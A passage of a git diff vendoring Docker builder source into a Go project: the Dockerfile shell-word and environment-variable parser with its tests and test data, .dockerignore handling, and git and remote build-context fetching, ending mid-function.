+// be added by adding code to the "special ${} format processing" section
+
+import (
+	"fmt"
+	"runtime"
+	"strings"
+	"text/scanner"
+	"unicode"
+)
+
+type shellWord struct {
+	word        string
+	scanner     scanner.Scanner
+	envs        []string
+	pos         int
+	escapeToken rune
+}
+
+// ProcessWord will use the 'env' list of environment variables,
+// and replace any env var references in 'word'.
+func ProcessWord(word string, env []string, escapeToken rune) (string, error) {
+	sw := &shellWord{
+		word:        word,
+		envs:        env,
+		pos:         0,
+		escapeToken: escapeToken,
+	}
+	sw.scanner.Init(strings.NewReader(word))
+	word, _, err := sw.process()
+	return word, err
+}
+
+// ProcessWords will use the 'env' list of environment variables,
+// and replace any env var references in 'word' then it will also
+// return a slice of strings which represents the 'word'
+// split up based on spaces - taking into account quotes.  Note that
+// this splitting is done **after** the env var substitutions are done.
+// Note, each one is trimmed to remove leading and trailing spaces (unless
+// they are quoted", but ProcessWord retains spaces between words.
+func ProcessWords(word string, env []string, escapeToken rune) ([]string, error) {
+	sw := &shellWord{
+		word:        word,
+		envs:        env,
+		pos:         0,
+		escapeToken: escapeToken,
+	}
+	sw.scanner.Init(strings.NewReader(word))
+	_, words, err := sw.process()
+	return words, err
+}
+
+func (sw *shellWord) process() (string, []string, error) {
+	return sw.processStopOn(scanner.EOF)
+}
+
+type wordsStruct struct {
+	word   string
+	words  []string
+	inWord bool
+}
+
+func (w *wordsStruct) addChar(ch rune) {
+	if unicode.IsSpace(ch) && w.inWord {
+		if len(w.word) != 0 {
+			w.words = append(w.words, w.word)
+			w.word = ""
+			w.inWord = false
+		}
+	} else if !unicode.IsSpace(ch) {
+		w.addRawChar(ch)
+	}
+}
+
+func (w *wordsStruct) addRawChar(ch rune) {
+	w.word += string(ch)
+	w.inWord = true
+}
+
+func (w *wordsStruct) addString(str string) {
+	var scan scanner.Scanner
+	scan.Init(strings.NewReader(str))
+	for scan.Peek() != scanner.EOF {
+		w.addChar(scan.Next())
+	}
+}
+
+func (w *wordsStruct) addRawString(str string) {
+	w.word += str
+	w.inWord = true
+}
+
+func (w *wordsStruct) getWords() []string {
+	if len(w.word) > 0 {
+		w.words = append(w.words, w.word)
+
+		// Just in case we're called again by mistake
+		w.word = ""
+		w.inWord = false
+	}
+	return w.words
+}
+
+// Process the word, starting at 'pos', and stop when we get to the
+// end of the word or the 'stopChar' character
+func (sw *shellWord) processStopOn(stopChar rune) (string, []string, error) {
+	var result string
+	var words wordsStruct
+
+	var charFuncMapping = map[rune]func() (string, error){
+		'\'': sw.processSingleQuote,
+		'"':  sw.processDoubleQuote,
+		'$':  sw.processDollar,
+	}
+
+	for sw.scanner.Peek() != scanner.EOF {
+		ch := sw.scanner.Peek()
+
+		if stopChar != scanner.EOF && ch == stopChar {
+			sw.scanner.Next()
+			break
+		}
+		if fn, ok := charFuncMapping[ch]; ok {
+			// Call special processing func for certain chars
+			tmp, err := fn()
+			if err != nil {
+				return "", []string{}, err
+			}
+			result += tmp
+
+			if ch == rune('$') {
+				words.addString(tmp)
+			} else {
+				words.addRawString(tmp)
+			}
+		} else {
+			// Not special, just add it to the result
+			ch = sw.scanner.Next()
+
+			if ch == sw.escapeToken {
+				// '\' (default escape token, but ` allowed) escapes, except end of line
+
+				ch = sw.scanner.Next()
+
+				if ch == scanner.EOF {
+					break
+				}
+
+				words.addRawChar(ch)
+			} else {
+				words.addChar(ch)
+			}
+
+			result += string(ch)
+		}
+	}
+
+	return result, words.getWords(), nil
+}
+
+func (sw *shellWord) processSingleQuote() (string, error) {
+	// All chars between single quotes are taken as-is
+	// Note, you can't escape '
+	var result string
+
+	sw.scanner.Next()
+
+	for {
+		ch := sw.scanner.Next()
+		if ch == '\'' || ch == scanner.EOF {
+			break
+		}
+		result += string(ch)
+	}
+
+	return result, nil
+}
+
+func (sw *shellWord) processDoubleQuote() (string, error) {
+	// All chars up to the next " are taken as-is, even ', except any $ chars
+	// But you can escape " with a \ (or ` if escape token set accordingly)
+	var result string
+
+	sw.scanner.Next()
+
+	for sw.scanner.Peek() != scanner.EOF {
+		ch := sw.scanner.Peek()
+		if ch == '"' {
+			sw.scanner.Next()
+			break
+		}
+		if ch == '$' {
+			tmp, err := sw.processDollar()
+			if err != nil {
+				return "", err
+			}
+			result += tmp
+		} else {
+			ch = sw.scanner.Next()
+			if ch == sw.escapeToken {
+				chNext := sw.scanner.Peek()
+
+				if chNext == scanner.EOF {
+					// Ignore \ at end of word
+					continue
+				}
+
+				if chNext == '"' || chNext == '$' {
+					// \" and \$ can be escaped, all other \'s are left as-is
+					ch = sw.scanner.Next()
+				}
+			}
+			result += string(ch)
+		}
+	}
+
+	return result, nil
+}
+
+func (sw *shellWord) processDollar() (string, error) {
+	sw.scanner.Next()
+	ch := sw.scanner.Peek()
+	if ch == '{' {
+		sw.scanner.Next()
+		name := sw.processName()
+		ch = sw.scanner.Peek()
+		if ch == '}' {
+			// Normal ${xx} case
+			sw.scanner.Next()
+			return sw.getEnv(name), nil
+		}
+		if ch == ':' {
+			// Special ${xx:...} format processing
+			// Yes it allows for recursive $'s in the ... spot
+
+			sw.scanner.Next() // skip over :
+			modifier := sw.scanner.Next()
+
+			word, _, err := sw.processStopOn('}')
+			if err != nil {
+				return "", err
+			}
+
+			// Grab the current value of the variable in question so we
+			// can use to to determine what to do based on the modifier
+			newValue := sw.getEnv(name)
+
+			switch modifier {
+			case '+':
+				if newValue != "" {
+					newValue = word
+				}
+				return newValue, nil
+
+			case '-':
+				if newValue == "" {
+					newValue = word
+				}
+				return newValue, nil
+
+			default:
+				return "", fmt.Errorf("Unsupported modifier (%c) in substitution: %s", modifier, sw.word)
+			}
+		}
+		return "", fmt.Errorf("Missing ':' in substitution: %s", sw.word)
+	}
+	// $xxx case
+	name := sw.processName()
+	if name == "" {
+		return "$", nil
+	}
+	return sw.getEnv(name), nil
+}
+
+func (sw *shellWord) processName() string {
+	// Read in a name (alphanumeric or _)
+	// If it starts with a numeric then just return $#
+	var name string
+
+	for sw.scanner.Peek() != scanner.EOF {
+		ch := sw.scanner.Peek()
+		if len(name) == 0 && unicode.IsDigit(ch) {
+			ch = sw.scanner.Next()
+			return string(ch)
+		}
+		if !unicode.IsLetter(ch) && !unicode.IsDigit(ch) && ch != '_' {
+			break
+		}
+		ch = sw.scanner.Next()
+		name += string(ch)
+	}
+
+	return name
+}
+
+func (sw *shellWord) getEnv(name string) string {
+	if runtime.GOOS == "windows" {
+		// Case-insensitive environment variables on Windows
+		name = strings.ToUpper(name)
+	}
+	for _, env := range sw.envs {
+		i := strings.Index(env, "=")
+		if i < 0 {
+			if runtime.GOOS == "windows" {
+				env = strings.ToUpper(env)
+			}
+			if name == env {
+				// Should probably never get here, but just in case treat
+				// it like "var" and "var=" are the same
+				return ""
+			}
+			continue
+		}
+		compareName := env[:i]
+		if runtime.GOOS == "windows" {
+			compareName = strings.ToUpper(compareName)
+		}
+		if name != compareName {
+			continue
+		}
+		return env[i+1:]
+	}
+	return ""
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go
new file mode 100644
index 0000000000..6cf691c077
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/shell_parser_test.go
@@ -0,0 +1,155 @@
+package dockerfile
+
+import (
+	"bufio"
+	"os"
+	"runtime"
+	"strings"
+	"testing"
+)
+
+func TestShellParser4EnvVars(t *testing.T) {
+	fn := "envVarTest"
+	lineCount := 0
+
+	file, err := os.Open(fn)
+	if err != nil {
+		t.Fatalf("Can't open '%s': %s", err, fn)
+	}
+	defer file.Close()
+
+	scanner := bufio.NewScanner(file)
+	envs := []string{"PWD=/home", "SHELL=bash", "KOREAN=한국어"}
+	for scanner.Scan() {
+		line := scanner.Text()
+		lineCount++
+
+		// Trim comments and blank lines
+		i := strings.Index(line, "#")
+		if i >= 0 {
+			line = line[:i]
+		}
+		line = strings.TrimSpace(line)
+
+		if line == "" {
+			continue
+		}
+
+		words := strings.Split(line, "|")
+		if len(words) != 3 {
+			t.Fatalf("Error in '%s' - should be exactly one | in:%q", fn, line)
+		}
+
+		words[0] = strings.TrimSpace(words[0])
+		words[1] = strings.TrimSpace(words[1])
+		words[2] = strings.TrimSpace(words[2])
+
+		// Key W=Windows; A=All; U=Unix
+		if (words[0] != "W") && (words[0] != "A") && (words[0] != "U") {
+			t.Fatalf("Invalid tag %s at line %d of %s. Must be W, A or U", words[0], lineCount, fn)
+		}
+
+		if ((words[0] == "W" || words[0] == "A") && runtime.GOOS == "windows") ||
+			((words[0] == "U" || words[0] == "A") && runtime.GOOS != "windows") {
+			newWord, err := ProcessWord(words[1], envs, '\\')
+
+			if err != nil {
+				newWord = "error"
+			}
+
+			if newWord != words[2] {
+				t.Fatalf("Error. Src: %s  Calc: %s  Expected: %s at line %d", words[1], newWord, words[2], lineCount)
+			}
+		}
+	}
+}
+
+func TestShellParser4Words(t *testing.T) {
+	fn := "wordsTest"
+
+	file, err := os.Open(fn)
+	if err != nil {
+		t.Fatalf("Can't open '%s': %s", err, fn)
+	}
+	defer file.Close()
+
+	envs := []string{}
+	scanner := bufio.NewScanner(file)
+	for scanner.Scan() {
+		line := scanner.Text()
+
+		if strings.HasPrefix(line, "#") {
+			continue
+		}
+
+		if strings.HasPrefix(line, "ENV ") {
+			line = strings.TrimLeft(line[3:], " ")
+			envs = append(envs, line)
+			continue
+		}
+
+		words := strings.Split(line, "|")
+		if len(words) != 2 {
+			t.Fatalf("Error in '%s' - should be exactly one | in: %q", fn, line)
+		}
+		test := strings.TrimSpace(words[0])
+		expected := strings.Split(strings.TrimLeft(words[1], " "), ",")
+
+		result, err := ProcessWords(test, envs, '\\')
+
+		if err != nil {
+			result = []string{"error"}
+		}
+
+		if len(result) != len(expected) {
+			t.Fatalf("Error. %q was suppose to result in %q, but got %q instead", test, expected, result)
+		}
+		for i, w := range expected {
+			if w != result[i] {
+				t.Fatalf("Error. %q was suppose to result in %q, but got %q instead", test, expected, result)
+			}
+		}
+	}
+}
+
+func TestGetEnv(t *testing.T) {
+	sw := &shellWord{
+		word: "",
+		envs: nil,
+		pos:  0,
+	}
+
+	sw.envs = []string{}
+	if sw.getEnv("foo") != "" {
+		t.Fatalf("2 - 'foo' should map to ''")
+	}
+
+	sw.envs = []string{"foo"}
+	if sw.getEnv("foo") != "" {
+		t.Fatalf("3 - 'foo' should map to ''")
+	}
+
+	sw.envs = []string{"foo="}
+	if sw.getEnv("foo") != "" {
+		t.Fatalf("4 - 'foo' should map to ''")
+	}
+
+	sw.envs = []string{"foo=bar"}
+	if sw.getEnv("foo") != "bar" {
+		t.Fatalf("5 - 'foo' should map to 'bar'")
+	}
+
+	sw.envs = []string{"foo=bar", "car=hat"}
+	if sw.getEnv("foo") != "bar" {
+		t.Fatalf("6 - 'foo' should map to 'bar'")
+	}
+	if sw.getEnv("car") != "hat" {
+		t.Fatalf("7 - 'car' should map to 'hat'")
+	}
+
+	// Make sure we grab the first 'car' in the list
+	sw.envs = []string{"foo=bar", "car=hat", "car=bike"}
+	if sw.getEnv("car") != "hat" {
+		t.Fatalf("8 - 'car' should map to 'hat'")
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/support.go b/vendor/github.com/docker/docker/builder/dockerfile/support.go
new file mode 100644
index 0000000000..e87588910b
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/support.go
@@ -0,0 +1,19 @@
+package dockerfile
+
+import "strings"
+
+// handleJSONArgs parses command passed to CMD, ENTRYPOINT, RUN and SHELL instruction in Dockerfile
+// for exec form it returns untouched args slice
+// for shell form it returns concatenated args as the first element of a slice
+func handleJSONArgs(args []string, attributes map[string]bool) []string {
+	if len(args) == 0 {
+		return []string{}
+	}
+
+	if attributes != nil && attributes["json"] {
+		return args
+	}
+
+	// literal string command, not an exec array
+	return []string{strings.Join(args, " ")}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/support_test.go b/vendor/github.com/docker/docker/builder/dockerfile/support_test.go
new file mode 100644
index 0000000000..7cc6fe9dcb
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/support_test.go
@@ -0,0 +1,65 @@
+package dockerfile
+
+import "testing"
+
+type testCase struct {
+	name       string
+	args       []string
+	attributes map[string]bool
+	expected   []string
+}
+
+func initTestCases() []testCase {
+	testCases := []testCase{}
+
+	testCases = append(testCases, testCase{
+		name:       "empty args",
+		args:       []string{},
+		attributes: make(map[string]bool),
+		expected:   []string{},
+	})
+
+	jsonAttributes := make(map[string]bool)
+	jsonAttributes["json"] = true
+
+	testCases = append(testCases, testCase{
+		name:       "json attribute with one element",
+		args:       []string{"foo"},
+		attributes: jsonAttributes,
+		expected:   []string{"foo"},
+	})
+
+	testCases = append(testCases, testCase{
+		name:       "json attribute with two elements",
+		args:       []string{"foo", "bar"},
+		attributes: jsonAttributes,
+		expected:   []string{"foo", "bar"},
+	})
+
+	testCases = append(testCases, testCase{
+		name:       "no attributes",
+		args:       []string{"foo", "bar"},
+		attributes: nil,
+		expected:   []string{"foo bar"},
+	})
+
+	return testCases
+}
+
+func TestHandleJSONArgs(t *testing.T) {
+	testCases := initTestCases()
+
+	for _, test := range testCases {
+		arguments := handleJSONArgs(test.args, test.attributes)
+
+		if len(arguments) != len(test.expected) {
+			t.Fatalf("In test \"%s\": length of returned slice is incorrect. Expected: %d, got: %d", test.name, len(test.expected), len(arguments))
+		}
+
+		for i := range test.expected {
+			if arguments[i] != test.expected[i] {
+				t.Fatalf("In test \"%s\": element as position %d is incorrect. Expected: %s, got: %s", test.name, i, test.expected[i], arguments[i])
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go b/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go
new file mode 100644
index 0000000000..80a3f1babf
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/utils_test.go
@@ -0,0 +1,50 @@
+package dockerfile
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+// createTestTempDir creates a temporary directory for testing.
+// It returns the created path and a cleanup function which is meant to be used as deferred call.
+// When an error occurs, it terminates the test.
+func createTestTempDir(t *testing.T, dir, prefix string) (string, func()) {
+	path, err := ioutil.TempDir(dir, prefix)
+
+	if err != nil {
+		t.Fatalf("Error when creating directory %s with prefix %s: %s", dir, prefix, err)
+	}
+
+	return path, func() {
+		err = os.RemoveAll(path)
+
+		if err != nil {
+			t.Fatalf("Error when removing directory %s: %s", path, err)
+		}
+	}
+}
+
+// createTestTempFile creates a temporary file within dir with specific contents and permissions.
+// When an error occurs, it terminates the test
+func createTestTempFile(t *testing.T, dir, filename, contents string, perm os.FileMode) string {
+	filePath := filepath.Join(dir, filename)
+	err := ioutil.WriteFile(filePath, []byte(contents), perm)
+
+	if err != nil {
+		t.Fatalf("Error when creating %s file: %s", filename, err)
+	}
+
+	return filePath
+}
+
+// createTestSymlink creates a symlink file within dir which points to oldname
+func createTestSymlink(t *testing.T, dir, filename, oldname string) string {
+	filePath := filepath.Join(dir, filename)
+	if err := os.Symlink(oldname, filePath); err != nil {
+		t.Fatalf("Error when creating %s symlink to %s: %s", filename, oldname, err)
+	}
+
+	return filePath
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerfile/wordsTest b/vendor/github.com/docker/docker/builder/dockerfile/wordsTest
new file mode 100644
index 0000000000..fa916c67f9
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerfile/wordsTest
@@ -0,0 +1,25 @@
+hello | hello
+hello${hi}bye | hellobye
+ENV hi=hi
+hello${hi}bye | hellohibye
+ENV space=abc  def
+hello${space}bye | helloabc,defbye
+hello"${space}"bye | helloabc  defbye
+hello "${space}"bye | hello,abc  defbye
+ENV leading=  ab c
+hello${leading}def | hello,ab,cdef
+hello"${leading}" def | hello  ab c,def
+hello"${leading}" | hello  ab c
+hello${leading} | hello,ab,c
+# next line MUST have 3 trailing spaces, don't erase them!
+ENV trailing=ab c   
+hello${trailing} | helloab,c
+hello${trailing}d | helloab,c,d
+hello"${trailing}"d | helloab c   d
+# next line MUST have 3 trailing spaces, don't erase them!
+hel"lo${trailing}" | helloab c   
+hello" there  " | hello there  
+hello there     | hello,there
+hello\ there | hello there
+hello" there | hello there
+hello\" there | hello",there
diff --git a/vendor/github.com/docker/docker/builder/dockerignore.go b/vendor/github.com/docker/docker/builder/dockerignore.go
new file mode 100644
index 0000000000..3da7913367
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerignore.go
@@ -0,0 +1,48 @@
+package builder
+
+import (
+	"os"
+
+	"github.com/docker/docker/builder/dockerignore"
+	"github.com/docker/docker/pkg/fileutils"
+)
+
+// DockerIgnoreContext wraps a ModifiableContext to add a method
+// for handling the .dockerignore file at the root of the context.
+type DockerIgnoreContext struct {
+	ModifiableContext
+}
+
+// Process reads the .dockerignore file at the root of the embedded context.
+// If .dockerignore does not exist in the context, then nil is returned.
+//
+// It can take a list of files to be removed after .dockerignore is removed.
+// This is used for server-side implementations of builders that need to send
+// the .dockerignore file as well as the special files specified in filesToRemove,
+// but expect them to be excluded from the context after they were processed.
+//
+// For example, server-side Dockerfile builders are expected to pass in the name
+// of the Dockerfile to be removed after it was parsed.
+//
+// TODO: Don't require a ModifiableContext (use Context instead) and don't remove
+// files, instead handle a list of files to be excluded from the context.
+func (c DockerIgnoreContext) Process(filesToRemove []string) error {
+	f, err := c.Open(".dockerignore")
+	// Note that a missing .dockerignore file isn't treated as an error
+	if err != nil {
+		if os.IsNotExist(err) {
+			return nil
+		}
+		return err
+	}
+	excludes, _ := dockerignore.ReadAll(f)
+	f.Close()
+	filesToRemove = append([]string{".dockerignore"}, filesToRemove...)
+	for _, fileToRemove := range filesToRemove {
+		rm, _ := fileutils.Matches(fileToRemove, excludes)
+		if rm {
+			c.Remove(fileToRemove)
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go
new file mode 100644
index 0000000000..2db67be799
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore.go
@@ -0,0 +1,49 @@
+package dockerignore
+
+import (
+	"bufio"
+	"bytes"
+	"fmt"
+	"io"
+	"path/filepath"
+	"strings"
+)
+
+// ReadAll reads a .dockerignore file and returns the list of file patterns
+// to ignore. Note this will trim whitespace from each line as well
+// as use GO's "clean" func to get the shortest/cleanest path for each.
+func ReadAll(reader io.Reader) ([]string, error) {
+	if reader == nil {
+		return nil, nil
+	}
+
+	scanner := bufio.NewScanner(reader)
+	var excludes []string
+	currentLine := 0
+
+	utf8bom := []byte{0xEF, 0xBB, 0xBF}
+	for scanner.Scan() {
+		scannedBytes := scanner.Bytes()
+		// We trim UTF8 BOM
+		if currentLine == 0 {
+			scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom)
+		}
+		pattern := string(scannedBytes)
+		currentLine++
+		// Lines starting with # (comments) are ignored before processing
+		if strings.HasPrefix(pattern, "#") {
+			continue
+		}
+		pattern = strings.TrimSpace(pattern)
+		if pattern == "" {
+			continue
+		}
+		pattern = filepath.Clean(pattern)
+		pattern = filepath.ToSlash(pattern)
+		excludes = append(excludes, pattern)
+	}
+	if err := scanner.Err(); err != nil {
+		return nil, fmt.Errorf("Error reading .dockerignore: %v", err)
+	}
+	return excludes, nil
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go
new file mode 100644
index 0000000000..612a1399cd
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerignore/dockerignore_test.go
@@ -0,0 +1,57 @@
+package dockerignore
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestReadAll(t *testing.T) {
+	tmpDir, err := ioutil.TempDir("", "dockerignore-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	di, err := ReadAll(nil)
+	if err != nil {
+		t.Fatalf("Expected not to have error, got %v", err)
+	}
+
+	if diLen := len(di); diLen != 0 {
+		t.Fatalf("Expected to have zero dockerignore entry, got %d", diLen)
+	}
+
+	diName := filepath.Join(tmpDir, ".dockerignore")
+	content := fmt.Sprintf("test1\n/test2\n/a/file/here\n\nlastfile")
+	err = ioutil.WriteFile(diName, []byte(content), 0777)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	diFd, err := os.Open(diName)
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer diFd.Close()
+
+	di, err = ReadAll(diFd)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if di[0] != "test1" {
+		t.Fatalf("First element is not test1")
+	}
+	if di[1] != "/test2" {
+		t.Fatalf("Second element is not /test2")
+	}
+	if di[2] != "/a/file/here" {
+		t.Fatalf("Third element is not /a/file/here")
+	}
+	if di[3] != "lastfile" {
+		t.Fatalf("Fourth element is not lastfile")
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/dockerignore_test.go b/vendor/github.com/docker/docker/builder/dockerignore_test.go
new file mode 100644
index 0000000000..3c0ceda4cf
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/dockerignore_test.go
@@ -0,0 +1,95 @@
+package builder
+
+import (
+	"io/ioutil"
+	"log"
+	"os"
+	"sort"
+	"testing"
+)
+
+const shouldStayFilename = "should_stay"
+
+func extractFilenames(files []os.FileInfo) []string {
+	filenames := make([]string, len(files), len(files))
+
+	for i, file := range files {
+		filenames[i] = file.Name()
+	}
+
+	return filenames
+}
+
+func checkDirectory(t *testing.T, dir string, expectedFiles []string) {
+	files, err := ioutil.ReadDir(dir)
+
+	if err != nil {
+		t.Fatalf("Could not read directory: %s", err)
+	}
+
+	if len(files) != len(expectedFiles) {
+		log.Fatalf("Directory should contain exactly %d file(s), got %d", len(expectedFiles), len(files))
+	}
+
+	filenames := extractFilenames(files)
+	sort.Strings(filenames)
+	sort.Strings(expectedFiles)
+
+	for i, filename := range filenames {
+		if filename != expectedFiles[i] {
+			t.Fatalf("File %s should be in the directory, got: %s", expectedFiles[i], filename)
+		}
+	}
+}
+
+func executeProcess(t *testing.T, contextDir string) {
+	modifiableCtx := &tarSumContext{root: contextDir}
+	ctx := DockerIgnoreContext{ModifiableContext: modifiableCtx}
+
+	err := ctx.Process([]string{DefaultDockerfileName})
+
+	if err != nil {
+		t.Fatalf("Error when executing Process: %s", err)
+	}
+}
+
+func TestProcessShouldRemoveDockerfileDockerignore(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-dockerignore-process-test")
+	defer cleanup()
+
+	createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777)
+	createTestTempFile(t, contextDir, dockerignoreFilename, "Dockerfile\n.dockerignore", 0777)
+	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+
+	executeProcess(t, contextDir)
+
+	checkDirectory(t, contextDir, []string{shouldStayFilename})
+
+}
+
+func TestProcessNoDockerignore(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-dockerignore-process-test")
+	defer cleanup()
+
+	createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777)
+	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+
+	executeProcess(t, contextDir)
+
+	checkDirectory(t, contextDir, []string{shouldStayFilename, DefaultDockerfileName})
+
+}
+
+func TestProcessShouldLeaveAllFiles(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-dockerignore-process-test")
+	defer cleanup()
+
+	createTestTempFile(t, contextDir, shouldStayFilename, testfileContents, 0777)
+	createTestTempFile(t, contextDir, DefaultDockerfileName, dockerfileContents, 0777)
+	createTestTempFile(t, contextDir, dockerignoreFilename, "input1\ninput2", 0777)
+
+	executeProcess(t, contextDir)
+
+	checkDirectory(t, contextDir, []string{shouldStayFilename, DefaultDockerfileName, dockerignoreFilename})
+
+}
diff --git a/vendor/github.com/docker/docker/builder/git.go b/vendor/github.com/docker/docker/builder/git.go
new file mode 100644
index 0000000000..74df244611
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/git.go
@@ -0,0 +1,28 @@
+package builder
+
+import (
+	"os"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/gitutils"
+)
+
+// MakeGitContext returns a Context from gitURL that is cloned in a temporary directory.
+func MakeGitContext(gitURL string) (ModifiableContext, error) {
+	root, err := gitutils.Clone(gitURL)
+	if err != nil {
+		return nil, err
+	}
+
+	c, err := archive.Tar(root, archive.Uncompressed)
+	if err != nil {
+		return nil, err
+	}
+
+	defer func() {
+		// TODO: print errors?
+		c.Close()
+		os.RemoveAll(root)
+	}()
+	return MakeTarSumContext(c)
+}
diff --git a/vendor/github.com/docker/docker/builder/remote.go b/vendor/github.com/docker/docker/builder/remote.go
new file mode 100644
index 0000000000..f3a4329d16
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remote.go
@@ -0,0 +1,157 @@
+package builder
+
+import (
+	"bytes"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"regexp"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/httputils"
+	"github.com/docker/docker/pkg/urlutil"
+)
+
+// When downloading remote contexts, limit the amount (in bytes)
+// to be read from the response body in order to detect its Content-Type
+const maxPreambleLength = 100
+
+const acceptableRemoteMIME = `(?:application/(?:(?:x\-)?tar|octet\-stream|((?:x\-)?(?:gzip|bzip2?|xz)))|(?:text/plain))`
+
+var mimeRe = regexp.MustCompile(acceptableRemoteMIME)
+
+// MakeRemoteContext downloads a context from remoteURL and returns it.
+//
+// If contentTypeHandlers is non-nil, then the Content-Type header is read along with a maximum of
+// maxPreambleLength bytes from the body to help detecting the MIME type.
+// Look at acceptableRemoteMIME for more details.
+//
+// If a match is found, then the body is sent to the contentType handler and a (potentially compressed) tar stream is expected
+// to be returned. If no match is found, it is assumed the body is a tar stream (compressed or not).
+// In either case, an (assumed) tar stream is passed to MakeTarSumContext whose result is returned.
+func MakeRemoteContext(remoteURL string, contentTypeHandlers map[string]func(io.ReadCloser) (io.ReadCloser, error)) (ModifiableContext, error) {
+	f, err := httputils.Download(remoteURL)
+	if err != nil {
+		return nil, fmt.Errorf("error downloading remote context %s: %v", remoteURL, err)
+	}
+	defer f.Body.Close()
+
+	var contextReader io.ReadCloser
+	if contentTypeHandlers != nil {
+		contentType := f.Header.Get("Content-Type")
+		clen := f.ContentLength
+
+		contentType, contextReader, err = inspectResponse(contentType, f.Body, clen)
+		if err != nil {
+			return nil, fmt.Errorf("error detecting content type for remote %s: %v", remoteURL, err)
+		}
+		defer contextReader.Close()
+
+		// This loop tries to find a content-type handler for the detected content-type.
+		// If it could not find one from the caller-supplied map, it tries the empty content-type `""`
+		// which is interpreted as a fallback handler (usually used for raw tar contexts).
+		for _, ct := range []string{contentType, ""} {
+			if fn, ok := contentTypeHandlers[ct]; ok {
+				defer contextReader.Close()
+				if contextReader, err = fn(contextReader); err != nil {
+					return nil, err
+				}
+				break
+			}
+		}
+	}
+
+	// Pass through - this is a pre-packaged context, presumably
+	// with a Dockerfile with the right name inside it.
+	return MakeTarSumContext(contextReader)
+}
+
+// DetectContextFromRemoteURL returns a context and in certain cases the name of the dockerfile to be used
+// irrespective of user input.
+// progressReader is only used if remoteURL is actually a URL (not empty, and not a Git endpoint).
+func DetectContextFromRemoteURL(r io.ReadCloser, remoteURL string, createProgressReader func(in io.ReadCloser) io.ReadCloser) (context ModifiableContext, dockerfileName string, err error) {
+	switch {
+	case remoteURL == "":
+		context, err = MakeTarSumContext(r)
+	case urlutil.IsGitURL(remoteURL):
+		context, err = MakeGitContext(remoteURL)
+	case urlutil.IsURL(remoteURL):
+		context, err = MakeRemoteContext(remoteURL, map[string]func(io.ReadCloser) (io.ReadCloser, error){
+			httputils.MimeTypes.TextPlain: func(rc io.ReadCloser) (io.ReadCloser, error) {
+				dockerfile, err := ioutil.ReadAll(rc)
+				if err != nil {
+					return nil, err
+				}
+
+				// dockerfileName is set to signal that the remote was interpreted as a single Dockerfile, in which case the caller
+				// should use dockerfileName as the new name for the Dockerfile, irrespective of any other user input.
+				dockerfileName = DefaultDockerfileName
+
+				// TODO: return a context without tarsum
+				r, err := archive.Generate(dockerfileName, string(dockerfile))
+				if err != nil {
+					return nil, err
+				}
+
+				return ioutil.NopCloser(r), nil
+			},
+			// fallback handler (tar context)
+			"": func(rc io.ReadCloser) (io.ReadCloser, error) {
+				return createProgressReader(rc), nil
+			},
+		})
+	default:
+		err = fmt.Errorf("remoteURL (%s) could not be recognized as URL", remoteURL)
+	}
+	return
+}
+
+// inspectResponse looks into the http response data at r to determine whether its
+// content-type is on the list of acceptable content types for remote build contexts.
+// This function returns:
+//    - a string representation of the detected content-type
+//    - an io.Reader for the response body
+//    - an error value which will be non-nil either when something goes wrong while
+//      reading bytes from r or when the detected content-type is not acceptable.
+func inspectResponse(ct string, r io.ReadCloser, clen int64) (string, io.ReadCloser, error) {
+	plen := clen
+	if plen <= 0 || plen > maxPreambleLength {
+		plen = maxPreambleLength
+	}
+
+	preamble := make([]byte, plen, plen)
+	rlen, err := r.Read(preamble)
+	if rlen == 0 {
+		return ct, r, errors.New("empty response")
+	}
+	if err != nil && err != io.EOF {
+		return ct, r, err
+	}
+
+	preambleR := bytes.NewReader(preamble)
+	bodyReader := ioutil.NopCloser(io.MultiReader(preambleR, r))
+	// Some web servers will use application/octet-stream as the default
+	// content type for files without an extension (e.g. 'Dockerfile')
+	// so if we receive this value we better check for text content
+	contentType := ct
